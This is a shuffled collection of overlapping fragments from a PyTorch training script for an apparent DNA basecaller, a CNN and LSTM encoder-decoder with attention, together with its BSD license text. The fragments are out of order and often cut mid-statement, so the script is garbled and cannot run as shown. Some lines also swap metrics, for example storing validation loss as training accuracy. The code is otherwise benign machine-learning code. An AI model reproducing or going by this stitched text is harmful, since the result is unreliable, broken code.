"= fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit",
"is typically chosen between 1 and a few hundreds, e.g. [batch size] =",
"error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()),",
"title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases",
"self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout # Define the",
"# ed2 = old_ed # # old_ed = ed2 # epoch_editd += ed",
"v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates",
"other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT",
"EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell",
"criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1)",
"choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step()",
"editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates]",
"# ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end",
"last element in the batch if i == max_in_batch: break # when seq",
"y_len_biases = [] for name in y_len: if \"bias\" in name and \"lstm\"",
"train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len = train_ds[4]",
"TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder))",
"if it has decresed, # and if it has, it will make a",
"are met: 1. Redistributions of source code must retain the above copyright notice,",
"WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO",
"= num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port =",
"encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward",
"size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port)",
"seq len if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :],",
"have equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None,",
"p in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1: #",
"source and binary forms, with or without modification, are permitted provided that the",
"= running_loss_val / float(iteration_val + 1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train",
"SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)",
"30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss",
"pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10,",
"data in enumerate(train_loader): model.train() #Set the parameter gradients to zero optimizer.zero_grad() batch_x =",
"plt.legend() plt.title(\"Error vs. updates from trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0,",
"fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs.",
"import matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import",
"clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate",
"in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases),",
"writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration)",
"# [seq_len, batch, input_dim] # undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out,",
"patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem = divmod(end-start, 3600) minutes, seconds",
"self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim *",
"print(start, end) # cellgate, outgate start, end = n//2, n # ordering ingate,",
"random import time import matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf",
"_, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens =",
"lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\" in name: if forget_bias",
"plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim",
"target = (seq*batch) # Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels",
":, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### ####",
"reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of not padded",
"bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation",
"distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping",
"model.train() #Set the parameter gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y =",
"input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2,",
"# old_ed = ed2 # epoch_editd += ed # running_editd_train += ed #",
"dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel()",
"probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers',",
"python \"\"\" BSD 2-Clause License Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution",
"dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers",
"p and \"linear\" not in p: n = matrix_param[p].shape[0] # input gate start,",
"input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val =",
"encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5",
"if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr:",
"True, help=\"File path to the pickle input file.\") parser.add_argument('-o', '--output', required = True,",
"sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so that padded",
"f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings",
"torch import torch.nn as nn from torch.autograd import Variable import torch.nn.functional as F",
"= self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the packing operation unpacked, unpacked_len",
"# LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0),",
"3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars = 0 for",
"(val_ds != None) and (updates % make_validation == 0): # or (updates ==",
"start, end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget",
":, :] # batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else:",
"use teacher forcing or not teacher_force = random.random() < teacher_forcing_ratio # put on",
"assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have equal number of layers!\"",
"ed2 = old_ed # # old_ed = ed2 # epoch_editd += ed #",
"if we are going to use teacher forcing or not teacher_force = random.random()",
"= pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure =",
"seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input for LSTM",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser",
"!= \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step() if (val_ds !=",
"1 [batch size, SOS token] for i in max_for: # Stop looping if",
"input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping object early_stopping = EarlyStopping(patience=patience,",
"+ 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc",
"##### Sorting ############################# ########################################### #### sort by decreasing target length sorted_len_target, sorted_idx_target =",
"c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) +",
"print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of updates= \",",
"pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1],",
"Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda",
"hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h =",
"size, SOS token] for i in max_for: # Stop looping if we got",
"1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in",
"= plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for p,",
"accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if",
"model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\" in name: if forget_bias !=",
"ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\"",
"the output _, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu()",
"packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out, hidden =",
"acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val],",
"teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False):",
"break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if",
"parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e',",
"help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed',",
"fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation",
"1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden):",
"Encoder ############################# ########################################### #### CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn =",
"trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest",
"> 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train,",
"self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder",
"self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False,",
"= self.init_hidden() # Forward pass through LSTM layer # shape of lstm_in: [batch,",
"of lstm_out: [batch, seq_len, output_dim] # shape of self.hidden: (a, b), where a",
"#arbitrary number of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update",
"F.sigmoid(outgate) cy = (forgetgate * c) + (ingate * cellgate) hy = outgate",
"nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)),",
"c = c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates =",
"hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder',",
"= torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden input =",
"encoder and decoder optimizer.step() if (val_ds != None) and (updates % make_validation ==",
"= labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting #############################",
"if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1)",
"running_editd_train = 0.0 running_editd_val = 0.0 updates = 0 heatmap_g = None heatmap_w",
"patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters",
"set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))],",
"= output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices",
"__init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder =",
"original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1,",
"labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size x out_size return out_decoder, labels_sorted,",
"shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create your datset",
"dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss",
"p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\" in name and",
"= {} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights = {} dict_gradients =",
"has {count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \"",
"OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN",
"def forward(self, x, hidden): h, c = hidden h = h.view(x.size(0), -1) c",
"if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit",
"torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2,",
"0 # ed2 = old_ed # # old_ed = ed2 # epoch_editd +=",
"batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder =",
"{} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {}",
"dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val /",
"labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input for",
"(torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input x is [batch,",
"= output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout #",
"= sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1,",
"unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:,",
"(c) 2021 (<EMAIL>) All rights reserved. Redistribution and use in source and binary",
"object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget",
"= bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4",
"#if teacher forcing, use actual next token as next input #if not, use",
"encoder and decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder",
"default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM",
"= {} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 =",
"= hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden = (h, c)",
"parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of",
"self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4",
"early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget =",
"= hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :,",
"0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs),",
"plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\")",
"= F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden,",
"seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label = y[:, :, i]",
"# output gate start, end = n//2 + n//4, n input_biases[idx_b+3, idx] =",
"batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True,",
"loss_train, acc_train, editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0,",
"and \"lstm_decoder\" in name and \"linear\" not in name: print(name,param.data.size()) n = param.size(0)",
"+ b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u",
"hidden = (h, c) label = y[not_padded_batches, :, i] # batch-i, features, seq",
"* 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration",
"max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best performances on",
"with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target length, batch size,",
"\"output\"]: y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases),",
"have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1]",
"val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5]",
"we are going to use teacher forcing or not teacher_force = random.random() <",
"hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2)",
"if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\")",
"linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True):",
"i = 0 for p, label in zip(input, [\"input gate\", \"forget gate\", \"cell",
"elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val",
"acc_val, editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2,",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser #",
"break # when seq length (i) >= true seq length if i >=",
"(hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size,",
"a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0],",
"= trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch,",
"= criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val,",
"batch = args.batch_size epochs = args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF",
"args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay",
"hspace=0.2, wspace=0.5) i = 0 for p, label in zip(input, [\"input gate\", \"forget",
"validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2],",
"4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input,",
"end) # cellgate, outgate start, end = n//2, n # ordering ingate, forgetgate,",
"'/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port),",
"SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY",
"dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc",
"default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate",
"dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss,",
"optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import",
"error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\")",
"batch-i, features, seq len y = y[not_padded_batches, :, :] # batch-i, features, seq",
"a few hundreds, e.g. [batch size] = 32 is a good default value",
"ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate)",
"remove neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm =",
"= labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size, seq_len",
"F import torchvision import pickle import random import time import matplotlib.pyplot as plt",
"input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :, :]",
"has, it will make a checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses),",
"alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i ==",
"editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit",
"\"<PAD>\"} editd = 0 num_chars = 0 for idx, length in enumerate(target_lengths): length",
"plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if editD: ax = fig.add_subplot(1, 3,",
"optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path +",
"index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so that padded items in the",
"updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses)",
"optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname),",
"unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True,",
"mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN #Forward pass, backward pass,",
"= train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get training data train_loader =",
"it has decresed, # and if it has, it will make a checkpoint",
"out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data",
"\"/\" + infile print(file_out) with open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path",
"self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward",
"This is what we'll initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port),",
